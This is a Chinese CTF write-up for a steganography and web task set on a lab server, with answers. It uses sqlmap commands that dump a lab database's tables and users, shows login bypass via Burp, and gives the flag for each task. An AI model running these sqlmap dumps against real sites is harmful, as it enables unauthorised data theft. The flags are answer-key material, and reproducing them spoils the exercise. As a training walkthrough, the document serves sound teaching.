信息隐藏 !!!!!!!!!!!!!
- 通过本地PC中渗透测试平台Kali,对服务器场景Web20200529中的网站进行访问,找到登录界面中的Flag,并将Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面背景中的Flag,并将Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行测试,在登录界面中登录,登录成功后在成功的界面中找到Flag并提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,登录成功后找到页面中的月亮,并将月亮中的信息破解,并将破解后的信息作为FLAG提交;
- 通过本地PC中渗透测试平台Kali,对服务器场景Web20200529中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载的文件解密,并将解密后的文件内容作为Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问并下载文件,将文件中的隐藏文件名全程作为Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,在登录界面中登录,登录失败后找到界面中的链接访问链接并下载文件,将文件中隐藏信息文件的内容作为Flag提交;
- 通过本地PC中渗透测试平台kali对服务器场景20200529中的网站进行访问,寻找每页中的隐藏信息,将每条信息按顺序合并,作为Flag提交;
如需要环境可以联系本人:1721676697QQ
解析:
第一题:找登录界面的Flag
进F12看,找到Soures选项,在里面找到class.css,往下翻就能找到到flag
Flag:WEKCOME TO CSS!
第二题:使用burp对登录界面进行抓包,然后找到图片复制bgf.jpg,使用burpsuite访问bgf.jpg,然后查找FLAG关键字
在最后的地方FLAG
Flag:Picturemerge
第三题:使用sqlmao工具爆库
sqlmap -u http://172.16.101.250/index.html --forms --level 5 --risk 3 --batch --dbs
我们可以看到特殊数据库 hello
然后我们去爆表
sqlmap -u http://172.16.101.250/index.html --forms --level 5 --risk 3 --batch -D hello --tables
我们可以看到user这个用户
我们再爆用户密码
sqlmap -u http://172.16.101.250/index.html --forms --level 5 --risk 3 --batch -D hello -T user --dump
我们使用burp抓登录包,将username改为123,password改为114514 点击GO ,再点击follow redirection
Flag:4C6F67696E207375636365737366756C
第四题:我们登录成功后会跳转dlc.html页面
点击右上角月亮,出现弹窗
猜测使用base64编码,使用base64 -d解密
还可以用burp抓登录成功的包,也会发现这串字符串,然后使用base64解密结果一样
Flag: Base64decryptedsuccessfully
第五题:题目中说道找到界面中的十字星,利用CTRL+A,可以发现右下角的十字星能点击
点击下载一个test.zip,可以使用winhex将十六进制部分09改为00,然后解压
将所选部分的09改为00
保存出来我们可以看到能打开flag.png了
然后我们放入Kali
Flag:UF71K2TW5JM88QZ8WMNTWKUY4
第六题:题目中说找登录失败后找到页面中的链接
我们抓包,使用burp可以抓一个登录成功的包,然后我们将密码改掉,点击GO 再点击follow redirection
在浏览器中访问treasure,html,访问连接,下载了一个bg.jpg文件
我们使用steghide工具分离这个文件
Flag:a.txt
第七题:我们用vim去看a.txt
我们发现了一个png,试着将a.txt格式改成png
发现flag
Flag:It is over Look back
第八题:找每页中隐藏的信息
第一页 index.html中F12我们可以看到(Hidden messages 1=Please)
第二个页面我们去看class.css
直接CTRL+F搜索hidden
我们发现hidden messages 2 = check
第三个页面去找登录成功的页面dlc.html
htdden messages 3 =every
第四个页面 treasure.html
登录treasure.html这个页面它只闪一下,我们可以使用burp抓包
然后发现 hidden Messages 4 = question
flag就是是个页面结合一下
Flag:Please check every question
信息隐藏 !!!!!!!!!!!!!相关推荐
- LSB图像信息隐藏算法matlab,实验二LSB信息隐藏实验.doc
实验二LSB信息隐藏实验.doc 实验二LSB信息隐藏实验 综合评分: [实验目的]: 掌握MATLAB基木操作 实现LSB信息隐藏和提取 [实验内容]:(请将你实验完成的项11涂"■&qu ...
- JS设计模式——3.封装与信息隐藏
封装.信息隐藏与接口的关系 信息隐藏是目的,封装是手段. 接口提供了一份记载着可供公共访问的方法的契约.它定义了两个对象间可以具有的关系.只要接口不变,这个关系的双方都是可以替换的. 一个理想的软件系 ...
- 设计的核心任务之二:信息隐藏
假使说我们认同软件的构造是一个复杂的过程,那么管理这种复杂度必然需要一些技巧.而为了找出这些技巧,则需要先瞄一眼这种复杂度的基本构成. 软件的构造过程牵涉了两个最为基本的要素:一是软件,一是构造软件的 ...
- java bmp信息隐藏_BMP图像信息隐藏及检测
1.实验目的 (1)了解BMP图像文件格式 (2)了解利用BMP图像文件隐藏信息的原理 (3)掌握基于24位真彩色BMP图像的文件信息隐藏方法 2.实验内容 (1)在图像数据后隐藏信息 (2)文件头与 ...
- [数据加密]GIS空间数据水印信息隐藏与加密技术方法[转]
到目前为止,国内外数字水印技术的研究主要集中在图像.视频和声音等多媒体信息的版权保护上,在GIS空间数据中,通过隐藏水印信息并对其加密.压缩以实现其安全保护的研究还很少,这是数字水印技术应用的一个新领 ...
- matlab信息隐藏算法,实验四--基于DCT域的信息隐藏算法
<实验四--基于DCT域的信息隐藏算法>由会员分享,可在线阅读,更多相关<实验四--基于DCT域的信息隐藏算法(6页珍藏版)>请在人人文库网上搜索. 1.实验四 基于DCT域的 ...
- 信息隐藏将txt文件合并到jpg文件中_使用Kali Linux在图像内隐藏机密消息—可在任何Linux发行版使用
欢迎回到"Esn技术社区"!今天,我们将演示如何使用Steghide(一种可在Kali Linux上使用的流行隐写工具)在图像内隐藏消息. 在计算机科学中,将信息隐藏在文件内(例如 ...
- 保密 | 利用DOS命令将文本信息隐藏在图片中
记录一次信息隐藏的小窍门,利用DOS事项将一段文本信息隐藏在图片之中 1.将要隐藏的文本内容保存至文本文件,将该文本文件与载体图片拷贝到一起,放置于一个文件夹中: 2.按Ctrl+R输入cmd切换到D ...
- 信息隐藏技术与应用期末复习
第一章 什么是信息隐藏? 信息隐藏是将秘密信息隐藏到一般的非秘密的数字媒体文件中,从而不让对手发觉的一种方法. 信息隐藏的应用领域: 数据保密 数据的不可抵赖性 数字作品的版权保护 防伪 数据的完整性 ...
- 基于MATLAB的混沌密码与数字图像加密应用、信息隐藏
基于MATLAB的混沌密码与数字图像加密应用.信息隐藏 实验目的:利用Matlab软件基于Logistic映射的加密算法对图像进行加密和解密,以及利用DEV C++软件.Excel表格绘制图像基于Lo ...
最新文章
- Axios 是一个基于 promise 的 HTTP 库,可以用在浏览器和 node.js 中。
- 趣谈网络协议笔记-二(第十讲)
- android-解决 Android N 上 报错:android.os.FileUriExposedException
- 计算机右键管理中没有用户管理,我的电脑右键菜单中没有管理选项如何解决? 我的电脑右键菜单中没有管理选项解决的方法有哪些?...
- 11相机不流畅_小米11最新售价确定,标准版价格亲民,网友:幸福来得真突然...
- Nginx服务系列——代理
- P4719-[模板]动态DP【矩阵乘法,树链剖分,线段树】
- html网页的结构框架代码
- 问题 B: 编写函数:Swap (I) (Append Code)
- 单例模式访问mysql设计类图_利用单例模式设计数据库连接Model类
- Mac OS下安装MangoDB及其使用配置
- 企业微信第三方应用添加好友
- MySQL中文无法按照拼音首字母排序解决方法convert(name USING gbk)
- PHP 该网页无法正常运作情况原因记录 code 500
- java 接口函数_Java函数式接口Supplier接口实例详解
- 步进电机stepmotor
- 以太坊白皮书(中英对照版)
- 河南省计算机考试题目,河南省事业单位工勤技能考试试题(计算机信息处理)
- reactos操作系统实现(47)
- 笔记本电脑使用电池时屏幕不停的更改亮度 - 解决方案
热门文章
- 自考知识电脑图计算机组成原理,自考“计算机组成原理”考试大纲
- 2654 最小距离最大
- 使用jqury的心得
- ECharts仪表盘(详细示例——附有具体注释)
- MatlabR2014a安装工具包
- 激活函数(sigmoid、Tanh、ReLU、Leaky ReLU、ELU、Maxout)
- PHP套件的实验结果分析,PHP环境搭建套件评比测 | Wopus
- PHP版本更新功能实现,技术分享:最低PHP版本更新操作 | Wopus
- 若依框架(Ruoyi-vue)上传视频且回显
- arduino密码锁代码